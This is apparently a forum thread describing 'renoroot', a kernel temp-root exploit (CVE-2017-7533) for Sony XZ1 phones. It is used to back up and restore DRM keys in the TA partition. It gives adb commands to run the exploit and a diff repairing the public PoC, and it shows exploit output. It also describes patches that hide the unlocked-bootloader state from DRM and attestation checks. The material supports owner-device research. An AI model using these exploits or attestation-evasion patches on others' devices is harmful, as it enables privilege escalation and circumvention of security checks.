Enable developer menu, enable adb and "Stay awake" option. An youtube video showing the initial setup to prepare for renoroot is available here.
Take a screenshot of service menu -> service tests -> security for reference and copy it from the phone.
Again be sure both wifi and mobile data connection are disabled to avoid any background internet access.
install the tools
Unzip renoroot.zip (download it bellow). Use following adb commands to get the tools to the phone:
Code:
adb push renoroot /data/local/tmp
adb push renoshell /data/local/tmp
adb push renosploit /data/local/tmp
adb install -r renotrap.apk
start the tools to get a temp root shell
Use adb shell to get a command line terminal to the phone and use following commands:
Code:
cd /data/local/tmp
chmod 755 reno*
./renoroot
The last command above will start the exploit eventually resulting with a temp root shell (that should be indicated by # char before the cursor).
It may get the phone to reboot in case an overwrite does not hit the wanted shaped heap object.
You may wait few minutes after the phone boots to allow startup processes to settle down in order to avoid timing influence for next trial.
There is a video for example of this step available here.
backup your TA partition
When renoroot is successful, you may use following commands in the root shell to backup the trim area partition:
Code:
cd /data/local/tmp
dd if=/dev/block/bootdevice/by-name/TA of=TA-locked.img
chown shell:shell TA-locked.img
sync
sync
And then try to read it out from the phone to your PC - use another command prompt window, do not exit the root one:
Code:
adb pull /data/local/tmp/TA-locked.img
unlock phone's bootloader using a code from sony
When you have the TA-locked.img on your PC including screenshots, you may start the official Sony unlock procedure - follow instructions on sony website please.
Added on 2019-04-16: please note, bootloader unlocking is not reversible - it is not possible to re-lock back (restore of TA-locked does not relock the bootloader).
So be prepared to live with the boot up warning screen (can be seen for example in this video).
Again be sure you have the TA-locked.img on your PC before you start unlocking the bootloader - unlock will erase you phone, so it would get lost from /data/local/tmp if not backed up.
In case oem unlocking is grayed out (so you cannot enable it) you need to go online at least once and the option would be accessible then - video here.
After you unlock the bootloader, do not flash anything - just boot the same unmodified fw we used for the temp root.
get temp root again to restore TA
Use the same instructions to avoid internet access and updates as described above, configure the few above mentioned options and start renoroot as before.
With the temp root shell, backup the unlocked TA (for future comparisons) and then restore the state from the locked one. You may need to adb push the TA-locked.img back to /data/local/tmp as the unlock erased everything.
Code:
cd /data/local/tmp
dd if=/dev/block/bootdevice/by-name/TA of=TA-unlocked.img
chown shell:shell TA-unlocked.img
sync
sync
And then try to read it out from the phone to your PC (and transfer the locked TA back to the phone) - use another command prompt window, do not exit the root one:
Code:
adb pull /data/local/tmp/TA-unlocked.img
adb push TA-locked.img /data/local/tmp
And using the window with renoshell temp root shell, restore the TA:
Code:
cd /data/local/tmp
dd if=TA-locked.img of=/dev/block/bootdevice/by-name/TA
sync
sync
boot up the phone with the current fw and see about the camera if it works on not
You may also document the security screen state by taking a screenshot. Do not forget to transfer it from the phone to PC.
flash twrp recovery
Updated on 2019-08-08: please see post#1029 for the latest workflow with the kernels hiding bootloader unlock status.
Updated on 2019-02-10:
Instead of flashing twrp, you may just 'fastboot boot' it if you need it.
Instead of the steps 10. to 13., you may use patched and rooted kernel hiding bootloader unlock available in following forum threads in order to be able to even install FOTA system update
[XZ1c] rooted kernel hiding bootloader unlock with working fota
[XZ1] rooted kernel hiding bootloader unlock with working fota
[XZp] rooted kernel hiding bootloader unlock with working fota
giving you back sony drm functionality that fw disables when it detects unlocked bootloader status. For more details see also post#645 of this thread.
OPTIONAL step (only for XZ1c maybe XZ1)
This step is optional and only lightly tested. The idea is that secd detects unlocked bootloader and switches to limited mode even though drm keys are available. This can be seen in the adb logcat with following message:
Code:
E secd : secd_backend_credential_manager.cpp:77 the bootloader is unlocked, use limited functionality
To workaround that, we may use a secd ripped from secd extension by modpunk - just flash attached secd-ignore-unlock.zip at bottom of this post via twrp recovery (do not flash the 'secd extension by modpunk' which is linked here only for reference).
I've analysed, what changes were done in the secd. Also the lib which fixes the missing device key in TA is not needed from the modpunk's package as we have the real valid key there, so I've removed the lib (and the script which would preload it). Therefore it is just about making secd think that bootloader was not unlocked. Thanks to @modpunk for the patched secd and @russel5 for the flashable zip on which the secd-ignore-unlock.zip is based on.
With this, sony updates may start to arrive.
Please note, this would make sony think the phone runs unmodified and still locked fw. OTA updates may restore original secd or fail altogether (due to modified system/vendor/... partitions).
You may boot the phone to see what happens (OTA updates?) - edit: OTA updates did come, but install to be done on reboot failed - tested by @Unbounded, see post#43 and #44 of the attest key thread please - this may confirm the availability of the SOMC Attest Key which may be the key needed to get sony ota updates (just a guess, not sure what exactly this key is used for).
Again, this step is optional and very experimental, maybe better not to apply it (camera works without this step on any stock fw without any change /until sony changes that in some update/).
Update: see post#395 for secd_ignore_unlock for XZ1c for pie from @S-trace - thank you. It works with XZ1 too (see post#396). The patch port for XZp pie is here: attest key thread post#67.
In my opinion all these secd patch variants are hiding the unlocked state only partially. There are other components in the fw that ask about the unlock state. A proper solution for this is the unlock hiding patched kernel linked in the step 10. of this howto.
flash a recent stock firmware
In case you wanted the patched secd, flash it again over the flashed fw.
Boot the phone, check functionality, take screenshots.
install magisk if rooted phone is what you need; -)
Follow instructions of latest magisk, it should work without any special actions.
AUTOMATED FULL BACKUP
These are experimental tools (and actually seem not to work in some cases getting truncated files that are useless) to extract most of the partitions from the phone after getting a temp root. It can be used for comparisons/analysis of what unlock changes (download backup-tools.zip at bottom of this post).
You would run backup-setup.bat in windows command prompt first (you may need to adjust the PATH setting to find adb properly) to copy the tools to the phone and setup tcp forwarding for netcat based copying.
Then using adb shell you would do:
Code:
cd /data/local/tmp
./backup-send.sh
and in windows command prompt you would start:
Code:
backup-recv.bat bk-unlocked
and partitions images would be extracted from the phone (for larger ones sparse android image format is used).
Full depth comparison could be achieved by use of these backup tools (obviously needs to be done twice - before and after unlock, changing the target directory name argument of backup-recv.bat).
WHAT WORKS
Here is a quote of post#185 from @tramtrist in this thread describing the results of the initial tests - special thanks to him!
tramtrist said:
I'd like to report in real quick on what's working.
After following @j4nn very clear instructions and backing up/restoring my TA keys I was left with the NOT PROVISIONED messages he mentioned earlier. However this seems to be no problem as after TA-restore my camera works as it did before. I'm also able to use WIDEVINE sites which require that key as well.
After restoring TA I went ahead and flashed the latest UK customized firmware
I then flashed TWRP latest version 3.2.3
I wanted to have root so I flashed Magisk 1.73 and safety net worked without me having to do anything special.
Google Pay could be set up and seems to be using my credit cards just fine.
I didn't flash any custom kernel as stock is just fine for me.
Adaway is working with root without issue.
All-in-all if you follow @j4nn instructions when he's ready to fully release them to the public then I'd say you will be in good shape.
I'd like to thank @j4nn for giving me the chance to finally contribute something concrete to this community. If you're gonna use this you should drop him some cash.
Click to expand...
Click to collapse
Update: if you follow the links added in step 10. and use "rooted kernel hiding bootloader unlock", it seems you can have all functionality restored including fota system updates while having magisk root with passed safetynet cts. Verified by @notaz in post#14 of the "[XZ1c] rooted kernel hiding bootloader unlock" thread. Thanks.
ACKNOWLEDGEMENTS
Many thanks to following users:
@moofesr - for testing initial kernel builds until proper build procedure had been found, special thanks for his patience when all tests resulted with bootloop
@Raz0Rfail and @moofesr - for testing timing of rename/notify vulnerability with patched kernel
@dosomder (aka zxz0O0) - for his iovyroot
@tramtrist - for initial testing of TA backup, unlock and restore, special thanks for exposing to risk of loosing drm if it did not work
@tonsofquestions - for a lot of testing with unlocked-ta-restored phone when I did not have an unlocked phone yet
ThomasKing (not a user on xda) - for his black hat ksma presentation
few other users in this and attest key lost thread here on xda - for some other cve possibilities, ideas and specific tests
DONATIONS
Please note: I had to invest enormously lot of time (as you can see throughout this thread and also summarized in progress/change log in post#2) to develop these tools, the code is extremely complex (more than 9000 lines of source code) and it was unbelievable hard to debug and get the timing usable.
It would be kind of you if you could consider donating here please:
https://j4nn.github.io/donate/
I would be happy to accept any donation to me as a form of gratitude in case the software helped you to backup your TA (drm keys) before bootloader unlocking.
Thanks.
DOWNLOAD THE TOOLS
See the attached renoroot.zip at bottom of this post.
Please post your experience with using the tools, if it worked and on which phone model (and fw in case of xz1c).
You may include info about how long it took to get a root shell, how many reboots, how many events in the last trial which succeeded with how many overwrites (just one with success is the best, more means previous overwrites did not hit wanted object in shaped heap resulting with possibly unstable system). This info is interesting for statistics, so we all know, how fast can we get a temp root on each device/firmware.
Thanks.
DEVELOPMENT PROGRESS / CHANGE LOG
26-05-2018 started this thread listing vulnerabilities found during many weeks of research done right after buy of my XZ1c phone
06-06-2018 post#7: managed to boot kernel from the 47.1.A.2.281 fw in qemu
16-06-2018 post#25: simple out of bounds overwrite not useful, complex exploiting of use after free needed
02-07-2018 post#33: explained how use after free exploit would work, but timing is impossible: kfree from rcu too late
06-07-2018 post#44 and post#48: more details about exploiting use after free and kfree_rcu too late kfree timing problem
17-07-2018 post#53: first kernel to test timing, did not boot when tried with unlocked xz1c
27-07-2018 post#73: solved the problem with delayed kfree from kfree_rcu, basic inotify/rename proof of concept running in qemu for long filenames
27-07-2018 post#75: found a way to build xz1c kernel from source which can be booted on unlocked xz1c, confirmed the delayed kfree from rcu timing problem
11-08-2018 post#88: extensive testing of timing
20-08-2018 post#104: inotify/rename exploit now works with long filenames, allowing kernel heap (256 bytes slub unit) overflow, overview of next phases of the exploit yet to be implemented
31-08-2018 post#118: implemented mostly arbitrary kernel write _together_ with mostly arbitrary kernel read, first bypass of KASLR but we need to bypass PXN & PAN too
15-09-2018 post#131: found that we will need ROP/JOP gadgets to overcome PXN & PAN oreo mitigations, more details in post#135
22-09-2018 post#137: first arbitrary kernel space read and write proof of concept working in qemu
22-09-2018 post#138: with great timing luck kernel space R/W poc worked on still locked xz1c
05-10-2018 post#146: first backup of my xz1c locked TA done: asking for an unlock-and-TA-restore test volunteer
07-10-2018 post#151: confirmed that BL unlock removed 66667 unit - device master key?
18-10-2018 post#162: exploit not reliable enough for public use yet
22-10-2018 post#165: renoroot preview video, send initial test version to @tramtrist
22-10-2018 post#168: renoroot initial test results - after TA restore camera works, BL remains unlocked
25-10-2018 post#185: more initial test results directly from @tramtrist
28-10-2018 post#199: researched possible uses of various keys from security service menu
03-11-2018 post#206: renoroot temp root including tools and howto for TA partition (drm keys) backup released, put everything on the first page
05-11-2018 post#235: renoroot confirmed working with other phone models
10-11-2018 post#287: ordered a new xz1c just for testing and development work
18-11-2018 post#348: the new xz1c arrived
22-11-2018 post#372: a persistent root from a temp root possibility - but not with selinux
11-12-2018 post#428: possibly the fastest temp root - 6.03 seconds with just 53 events and 1 overwrite
05-01-2019 post#493: explained about TA restore not re-locking bootloader - good for us!
09-01-2019 post#515: intercept BL unlock of xz1c in the middle of the procedure
10-01-2019 post#516: posted few videos to highlight key points when preparing for unlock with backup of TA via renoroot temproot
10-01-2019 post#517: video showing xz1c bl unlock with twrp booted in the middle
11-01-2019 post#520: howto for unlock with the twrp booted in the middle
19-01-2019 post#602: info about test to write dev master key TA unit from the secd process
30-01-2019 post#620: info about TA restore and various drm keys
02-02-2019 post#623: preview of FOTA system update fully installed with unlocked and rooted XZ1c - it confirms all functionality of a locked phone have been restored
05-02-2019 post#633: tested fota system update from oreo to pie - posted a video
10-02-2019 post#645: kernels hiding bootloader unlock released for XZ1c/XZ1/XZp - with locked TA restored this brings root with all locked phone functionality of stock fw restored
16-02-2019 post#652: ported BL unlock hiding patch to TAMA platform for testing with XZ2 (it worked, but cannot be booted via fastboot due to bug in bootloader according to sony /more details here/)
19-02-2019 post#663: patched XZ2 kernel to make it boot via 'fastboot boot' command from usb (tested successfully by @serajr post#664) - shall be useful for twrp setup on TAMA platform (post#668 by @MartinX3)
19-02-2019 post#672: fota system update with my rooted kernels verified with XZ2 phone by @serajr - so we may have fota system update with root on xz2/xz2c/xz2p/xz3 phones too (theoretically)
---->> moved the original opening post in here ----
Downgrade XZ1 Compact to 47.1.A.2.281 firmware version (not sure if this downgrade is safe, see android-attest-key-lost thread here please). The 47.1.A.2.324_CE1 version might be better to try first.
The 2.281 fw results with android security patch level 2017-08-05, kernel 4.4.74, android oreo.
BlueBorne vulnerabilities are not patched yet with this firmware:
CVE-2017-0785 Android information leak vulnerability PoC seems to work - tested myself.
Not sure, but it seems that bluetooth service is not a 32bit process anymore, contrary the note in BlueBorne whitepaper /The​ ​Bluetooth​ ​service​ ​in​ ​Android​ ​runs​ ​under​ ​Zygote​ ​(Android​ ​service​ ​manager),​ ​and​ ​is surprisingly​ ​a​ ​32-bit​ ​process​ ​(even​ ​when​ ​the​ ​OS​ ​and​ ​CPU​ ​are​ ​ARM-64​ ​for​ ​instance/ - example of stack dump obtained:
Code:
000000b0 00 00 00 00 ff ff ff fd ff ff ff ff d8 69 f4 80 │····│····│····│·i··│
000000c0 00 00 00 73 e8 60 0c 10 00 00 00 73 e8 60 01 40 │···s│·`··│···s│·`·@│
000000d0 00 00 00 73 d8 6b 20 08 00 00 00 73 e8 69 06 d0 │···s│·k ·│···s│·i··│
...
000007e0 00 00 00 73 2c 32 34 38 72 68 74 20 20 64 61 65 │···s│,248│rht │ dae│
000007f0 65 6d 61 6e 5f 74 62 20 6b 72 6f 77 75 65 75 71 │eman│_tb │krow│ueuq│
00000800 74 73 20 65 65 74 72 61 00 00 00 64 00 00 00 00 │ts e│etra│···d│····│
Those '00 00 00 73' are often present, quite possibly the upper 32bit part of a 64bit pointer. The text at 7e8 may be something like 'thread name bt_workqueue started', possibly indicating the CVE-2017-078 PoC worked (modified so that 'n = 90' to receive more data).
The first idea was to make the Android BlueBorne exploit working to obtain bluetooth service credentails and use that with some kernel exploit to switch to root in order to finally do TA partition backup (to save DRM keys).
The bluetooth user seems to have the NET_ADMIN capability, that could be very useful.
I've researched further possible kernel exploits and it seems to me that the kernel from 2.281 firmware seems to contain (at least) following vulnerabilities:
CVE-2017-7308 AF_PACKET packet_set_ring
This needs NET_RAW capability, that may be hard to obtain, bluetooth service seems not to have it.
CVE-2017-7533 race between inotify_handle_event() and vfs_rename()
https://exploit.kitploit.com/2017/08/linux-kernel-412-race-condition.html
This may work as a standalone exploit - checked the kernel source - vulnerability is not fixed, not sure about SElinux limitations and other android security mitigations - please discuss this.
Found only demo poc not getting root, but it may be possibly developed to full temp root standalone exploit.
This currently seems to be the most promising.
CVE-2017-1000112 memory corruption in UDP fragmentation offload
https://securingtomorrow.mcafee.com...vilege-escalation-analyzing-cve-2017-1000112/
https://ricklarabee.blogspot.cz/2017/12/adapting-poc-for-cve-2017-1000112-to.html
https://www.exploit-db.com/exploits/43418/
This could be used after BlueBorne done, as it needs NET_ADMIN capability.
HELP NEEDED PLEASE - let's collaborate and develop together the needed exploits!
For example it is hard for me to develop only with a locked device, better debugging may be possible on stock firmware with unlocked bootloader as some modifications may be flashed. My free time is quite limitted, so it would be useful to split the work.
----<< moved the original opening post in here ----
It seems that 'CVE-2017-7533 race between inotify_handle_event() and vfs_rename()' is not possible to trigger from adb shell - possibly some android security mitigations/selinux limitation?
Built exploit.c from CVE-2017-7533 with attached View attachment CVE-2017-7533-android-build.tar.gz android makefiles, adb pushed to /data/local/tmp:
Code:
G8441:/ $ uname -a
Linux localhost 4.4.74-perf+ #1 SMP PREEMPT Wed Aug 9 16:09:57 2017 aarch64
G8441:/ $ cd /data/local/tmp
G8441:/data/local/tmp $ ./exploit 2>err.log
Listening for events.
Listening for events.
alloc_len : 50
longname="test_dir/bbbb32103210321032100��1����test_dir/bbbb3210321032103210"
alloc_len : 50
callrename done.
G8441:/data/local/tmp $
the notify events seem not to be received
The rename function works in the exploit (tested separately), but many errors such as
rename1: No such file or directory
rename2: No such file or directory
are returned from the exploit though.
The inotify_init1 function returns valid fd, so it looks like everything is ok, but for unknown reason, inotify events are not received.
Running the same code in linux with vulnerable kernel results with this:
Code:
Linux 4.8.0 #1 SMP Tue Oct 25 09:09:01 UTC 2016 x86_64 Intel(R) Core(TM) i5-2500K CPU @ 3.30GHz GenuineIntel GNU/Linux
Listening for events.
Listening for events.
alloc_len : 50
longname="test_dir/bbbb32103210321032100ÿÿ1ÿÿÿÿ"
handle_events() event->name : bbbb32103210321032100ÿÿ1ÿÿÿÿ, event->len : 32
handle_events() event->name : b, event->len : 16
Detected overwrite!!!
callrename done.
alloc_len : 50
Note the 'handle_events' log message presence - that indicates receive of inotify event. The rename errors are not returned in this case.
That means even though the kernel is vulnerable (as verified in sony release source code - it is fixed since 47.1.A.12.34 version as can be seen with 'git log --stat -p origin/47.1.A.12.xxx -- fs/dcache.c' in sony's kernel git repository), it looks like we cannot trigger the bug simply from adb shell.
This is what is configured in the kernel (using sony's build instructions):
CONFIG_FSNOTIFY=y
CONFIG_DNOTIFY=y
CONFIG_INOTIFY_USER=y
# CONFIG_FANOTIFY is not set
Am I missing something? Any idea why the bug cannot be triggered?
--previous edit-- 27-05-2018 at 22:58. Reason: added info about rename() on xz1c; added info about inotify_init1() on xz1c; added info about 1st fw version with a fix and relevant kernel config options
It doesn't trigger because the exploit itself is broken:
Code:
@@ -280,7 +280,7 @@ void *callrename( void *ptr )
char enter = 0;
char origname[1024];
char longname[1024];
- char next_ptr[8] = "\x30\xff\xff\x31\xff\xff\xff\xff";
+ char next_ptr[9] = "\x30\xff\xff\x31\xff\xff\xff\xff";
char prev_ptr[8] = "";
// This value will overwrite the next (struct fsnotify_event)event->list.next
With that it should work (not tested though).
Elevating through heap/slab overflow is not going to be straightforward though. As the redhat description states, we could redirect the free list pointer to userspace and provoke the kernel to put some function pointers there for us to modify, but as soon as a context switch happens the system will crash and burn. I guess easiest way would be to combine this with some older heap overflow exploit, assuming such thing exists (haven't looked)...
Thanks, your change really made it working:
Code:
G8441:/data/local/tmp $ ./exploit
Listening for events.
Listening for events.
alloc_len : 50
longname="test_dir/bbbb32103210321032100��1����"
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
...
handle_events() event->name : b, event->len : 16
Detected overwrite!!!
alloc_len : 50
callrename done.
So this could be a way after all even though not easy.
It has been done already, oreo root exploit is existing and it uses the CVE-2017-7533 (race between inotify and rename) as a starting point. Unfortunately the exploit itself is not released yet.
There are slides explaining basics about the exploit available:
asia-18-WANG-KSMA-Breaking-Android-kernel-isolation-and-Rooting-with-ARM-MMU-features.pdf
It continues even with a lot more interesting second stage exploit which mirrors kernel space memory for user space access using forgotten/overlooked feature of arm page table (address translation) setup.
Not sure when the exploit may be released - they are probably holding it back intentionally.
I guess that it will not be released for a long time because the Kernel Space Mirroring Attack is a totally new vulnerability (probably even without CVE yet). So they wait first for CVE assignment and then wait for google to release a fix and wait even more to allow vendors to deploy it to customers.
There are patches to KSMA being discussed on LKML since May 29th so things are moving on.
There's also a demo of the exploit here: https://youtube.com/watch?v=2zGTEv-iUOY
Managed to boot kernel from the 47.1.A.2.281 fw in qemu - dmesg here:
Code:
[ 0.000000] Booting Linux on physical CPU 0x0
[ 0.000000] Initializing cgroup subsys cpuset
[ 0.000000] Initializing cgroup subsys cpu
[ 0.000000] Initializing cgroup subsys cpuacct
[ 0.000000] Initializing cgroup subsys schedtune
[ 0.000000] Linux version 4.4.74-perf+ ([email protected]) (gcc version 4.9.x 20150123 (prerelease) (GCC) ) #1 SMP PREEMPT Wed Aug 9 16:09:57 2017
[ 0.000000] Boot CPU: AArch64 Processor [411fd070]
[ 0.000000] Machine: linux,dummy-virt
[ 0.000000] cma: Reserved 16 MiB at 0x00000000bf000000
[ 0.000000] On node 0 totalpages: 524288
[ 0.000000] DMA zone: 8192 pages used for memmap
[ 0.000000] DMA zone: 0 pages reserved
[ 0.000000] DMA zone: 524288 pages, LIFO batch:31
[ 0.000000] psci: probing for conduit method from DT.
[ 0.000000] psci: PSCIv0.2 detected in firmware.
[ 0.000000] psci: Using standard PSCI v0.2 function IDs
[ 0.000000] psci: Trusted OS migration not required
[ 0.000000] psci: Initializing psci_cpu_init
[ 0.000000] PERCPU: Embedded 21 pages/cpu @ffffffc07efaf000 s47936 r8192 d29888 u86016
[ 0.000000] pcpu-alloc: s47936 r8192 d29888 u86016 alloc=21*4096
[ 0.000000] pcpu-alloc: [0] 0 [0] 1
[ 0.000000] CPU features: enabling workaround for ARM erratum 832075
[ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 516096
[ 0.000000] Kernel command line: nokaslr androidboot.selinux=permissive
[ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes)
[ 0.000000] Dentry cache hash table entries: 262144 (order: 9, 2097152 bytes)
[ 0.000000] Inode-cache hash table entries: 131072 (order: 8, 1048576 bytes)
[ 0.000000] software IO TLB [mem 0xb8a00000-0xbca00000] (64MB) mapped at [ffffffc078a00000-ffffffc07c9fffff]
[ 0.000000] Memory: 1923764K/2097152K available (17918K kernel code, 2652K rwdata, 8904K rodata, 10240K init, 2852K bss, 157004K reserved, 16384K cma-reserved)
[ 0.000000] Virtual kernel memory layout:
[ 0.000000] modules : 0xffffff8000000000 - 0xffffff8008000000 ( 128 MB)
[ 0.000000] vmalloc : 0xffffff8008000000 - 0xffffffbdbfff0000 ( 246 GB)
[ 0.000000] .init : 0xffffff8009c00000 - 0xffffff800a600000 ( 10240 KB)
[ 0.000000] .text : 0xffffff8008080000 - 0xffffff8009200000 ( 17920 KB)
[ 0.000000] .rodata : 0xffffff8009200000 - 0xffffff8009c00000 ( 10240 KB)
[ 0.000000] .data : 0xffffff800a600000 - 0xffffff800a897300 ( 2653 KB)
[ 0.000000] vmemmap : 0xffffffbdc0000000 - 0xffffffbfc0000000 ( 8 GB maximum)
[ 0.000000] 0xffffffbdc0000000 - 0xffffffbdc2000000 ( 32 MB actual)
[ 0.000000] fixed : 0xffffffbffe7fd000 - 0xffffffbffec00000 ( 4108 KB)
[ 0.000000] PCI I/O : 0xffffffbffee00000 - 0xffffffbfffe00000 ( 16 MB)
[ 0.000000] memory : 0xffffffc000000000 - 0xffffffc080000000 ( 2048 MB)
[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1
[ 0.000000] HMP scheduling enabled.
[ 0.000000] Preemptible hierarchical RCU implementation.
[ 0.000000] RCU dyntick-idle grace-period acceleration is enabled.
[ 0.000000] RCU restricting CPUs from NR_CPUS=8 to nr_cpu_ids=2.
[ 0.000000] RCU kthread priority: 1.
[ 0.000000] RCU: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=2
[ 0.000000] NR_IRQS:64 nr_irqs:64 0
[ 0.000000] GICv2m: Node v2m: range[0x8020000:0x8020fff], SPI[80:144]
[ 0.000000] Offload RCU callbacks from all CPUs
[ 0.000000] Offload RCU callbacks from CPUs: 0-1.
[ 0.000000] Architected cp15 timer(s) running at 62.50MHz (virt).
[ 0.000000] clocksource: arch_sys_counter: mask: 0xffffffffffffff max_cycles: 0x1cd42e208c, max_idle_ns: 881590405314 ns
[ 0.000129] sched_clock: 56 bits at 62MHz, resolution 16ns, wraps every 4398046511096ns
[ 0.000754] clocksource: Switched to clocksource arch_sys_counter
[ 0.002862] Calibrating delay loop (skipped), value calculated using timer frequency.. 125.00 BogoMIPS (lpj=625000)
[ 0.003047] pid_max: default: 32768 minimum: 301
[ 0.003929] Security Framework initialized
[ 0.004069] SELinux: Initializing.
[ 0.004522] SELinux: Starting in permissive mode
[ 0.004966] Mount-cache hash table entries: 4096 (order: 3, 32768 bytes)
[ 0.005017] Mountpoint-cache hash table entries: 4096 (order: 3, 32768 bytes)
[ 0.023663] Initializing cgroup subsys memory
[ 0.024136] Initializing cgroup subsys freezer
[ 0.024256] Initializing cgroup subsys debug
[ 0.038338] /cpus/[email protected]: Unknown CPU type
[ 0.038415] /cpus/[email protected]: Unknown CPU type
[ 0.038571] CPU0: update cpu_capacity 1024
[ 0.039453] ASID allocator initialised with 65536 entries
[ 0.078493] mem dump base table DT node does not exist
[ 0.078665] couldn't find /soc/[email protected] node
[ 0.090148] CPU1: update cpu_capacity 1024
[ 0.090682] CPU1: Booted secondary processor [411fd070]
[ 0.095452] Brought up 2 CPUs
[ 0.095541] SMP: Total of 2 processors activated.
[ 0.095833] CPU: All CPU(s) started at EL1
[ 0.096572] alternatives: patching kernel code
[ 0.323842] CPU1: update max cpu_capacity 1024
[ 0.341084] CPU1: update max cpu_capacity 1024
[ 0.351666] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 19112604462750000 ns
[ 0.351818] futex hash table entries: 512 (order: 3, 32768 bytes)
[ 0.357620] pinctrl core: initialized pinctrl subsystem
[ 0.360215] debug region node not found
[ 0.372552] NET: Registered protocol family 16
[ 0.376688] schedtune: init normalization constants...
[ 0.376756] schedtune: disabled!
[ 0.401557] cpuidle: using governor ladder
[ 0.421111] cpuidle: using governor menu
[ 0.441126] cpuidle: using governor qcom
[ 0.441993] vdso: 2 pages (1 code @ ffffff8009206000, 1 data @ ffffff800a604000)
[ 0.447772] DMA: preallocated 256 KiB pool for atomic allocations
[ 0.470943] exit: IPA_USB init success!
[ 0.499315] of_amba_device_create(): amba_device_add() failed (-517) for /[email protected]
[ 0.501005] of_amba_device_create(): amba_device_add() failed (-517) for /[email protected]
[ 0.501372] of_amba_device_create(): amba_device_add() failed (-517) for /[email protected]
[ 0.603967] ACPI: Interpreter disabled.
[ 0.604525] socinfo_init: Can't find SMEM_HW_SW_BUILD_ID; falling back on dummy values.
[ 0.605154] Unknown SOC ID!
[ 0.605447] ------------[ cut here ]------------
[ 0.605487] WARNING: at /home/hudsonslave/root/workspace/offbuild_pre-yoshino2-2.0.0_android_matrix/HUDSON_PRODUCT/lilac/HUDSON_VARIANT/user/label/CM/kernel/msm-4.4/drivers/soc/qcom/socinfo.c:1622
[ 0.605547] Modules linked in:
[ 0.605652]
[ 0.605853] CPU: 1 PID: 1 Comm: swapper/0 Not tainted 4.4.74-perf+ #1
[ 0.605889] Hardware name: linux,dummy-virt (DT)
[ 0.605991] task: ffffffc0784d8000 ti: ffffffc0784b4000 task.ti: ffffffc0784b4000
[ 0.606070] PC is at socinfo_init+0x118/0x7a4
[ 0.606123] LR is at socinfo_init+0x118/0x7a4
[ 0.606153] pc : [<ffffff8009c36b98>] lr : [<ffffff8009c36b98>] pstate: 60400045
[ 0.606177] sp : ffffffc0784b7c80
[ 0.606216] x29: ffffffc0784b7cf0 x28: ffffff8009c81a00
[ 0.606279] x27: ffffff8009c73590 x26: ffffff8009c73570
[ 0.606311] x25: ffffff8009c004b4 x24: ffffff800a9f82f0
[ 0.606341] x23: 0000000000000000 x22: 0000000000000001
[ 0.606371] x21: ffffff800a606000 x20: ffffff800a9f8000
[ 0.606401] x19: ffffff800927a000 x18: 0000000000040000
[ 0.606431] x17: 0000000000003a7f x16: 0000000000000002
[ 0.606461] x15: 0000000000007fff x14: 7564206e6f206b63
[ 0.606491] x13: ffffffffffff0000 x12: 0000000000000028
[ 0.606521] x11: 0000000000000006 x10: ffffff800a89e000
[ 0.606570] x9 : 0000000000000057 x8 : 0000000000000000
[ 0.606601] x7 : 0000000000000000 x6 : ffffff800a89f14e
[ 0.606631] x5 : 0000000000000000 x4 : 0000000000000000
[ 0.606660] x3 : 0000000000000000 x2 : ffffffc0784b4000
[ 0.606689] x1 : 0000000000000000 x0 : 000000000000000f
[ 0.606765]
[ 0.606765] PC: 0xffffff8009c36b58:
[ 0.606801] 6b58 2a1703e2 2a1603e3 52800004 52800185 97956505 52800180 b9000b00 14000002
[ 0.607340] 6b78 b9000b00 f9417a80 b4000060 b9400400 350000a0 90ffde00 912c8000 979564fa
[ 0.607704] 6b98 d4210000 f9417a80 b40000a0 b9400401 71051c3f 54000049 d4210000 b9400401
[ 0.608063] 6bb8 f0ffb200 911aa000 910bc296 8b011000 b940c000 b9000ec0 97a6ab44 b9400ac3
[ 0.608465]
[ 0.608465] LR: 0xffffff8009c36b58:
[ 0.608495] 6b58 2a1703e2 2a1603e3 52800004 52800185 97956505 52800180 b9000b00 14000002
[ 0.608880] 6b78 b9000b00 f9417a80 b4000060 b9400400 350000a0 90ffde00 912c8000 979564fa
[ 0.609281] 6b98 d4210000 f9417a80 b40000a0 b9400401 71051c3f 54000049 d4210000 b9400401
[ 0.609640] 6bb8 f0ffb200 911aa000 910bc296 8b011000 b940c000 b9000ec0 97a6ab44 b9400ac3
[ 0.610033]
[ 0.610033] SP: 0xffffffc0784b7c40:
[ 0.610062] 7c40 09c36b98 ffffff80 784b7c80 ffffffc0 09c36b98 ffffff80 60400045 00000000
[ 0.610464] 7c60 ffffffff 00000000 00000000 00000000 ffffffff ffffffff 6c6c7443 6e721f78
[ 0.610948] 7c80 784b7c90 ffffffc0 ff0a0005 ffffffff 784b7d10 ffffffc0 083ad368 ffffff80
[ 0.611330] 7ca0 0000020f 00000000 0a89b000 ffffff80 09aac8b8 ffffff80 09c36a80 ffffff80
[ 0.611725]
[ 0.611845] ---[ end trace cf17d4d9cad0286c ]---
[ 0.611997] Call trace:
[ 0.612231] Exception stack(0xffffffc0784b7ab0 to 0xffffffc0784b7be0)
[ 0.612455] 7aa0: ffffff800927a000 0000008000000000
[ 0.612613] 7ac0: 0000000042b66000 ffffff8009c36b98 ffffff80097286c0 ffffff800a626f48
[ 0.612730] 7ae0: 0000000100000000 ffffff800a89f130 ffffffc0784b7b00 ffffff8008110ce0
[ 0.612845] 7b00: ffffffc0784b7ba0 ffffff800811104c ffffff8008111014 ffffff800a9f8000
[ 0.612960] 7b20: ffffff800a606000 0000000000000001 0000000000000000 ffffff800a9f82f0
[ 0.613074] 7b40: ffffff8009c004b4 ffffff8009c73570 000000000000000f 0000000000000000
[ 0.613187] 7b60: ffffffc0784b4000 0000000000000000 0000000000000000 0000000000000000
[ 0.613304] 7b80: ffffff800a89f14e 0000000000000000 0000000000000000 0000000000000057
[ 0.613418] 7ba0: ffffff800a89e000 0000000000000006 0000000000000028 ffffffffffff0000
[ 0.613534] 7bc0: 7564206e6f206b63 0000000000007fff 0000000000000002 0000000000003a7f
[ 0.613661] [<ffffff8009c36b98>] socinfo_init+0x118/0x7a4
[ 0.613719] [<ffffff8008083adc>] do_one_initcall+0xc4/0x1dc
[ 0.613771] [<ffffff8009c00e68>] kernel_init_freeable+0x1a8/0x248
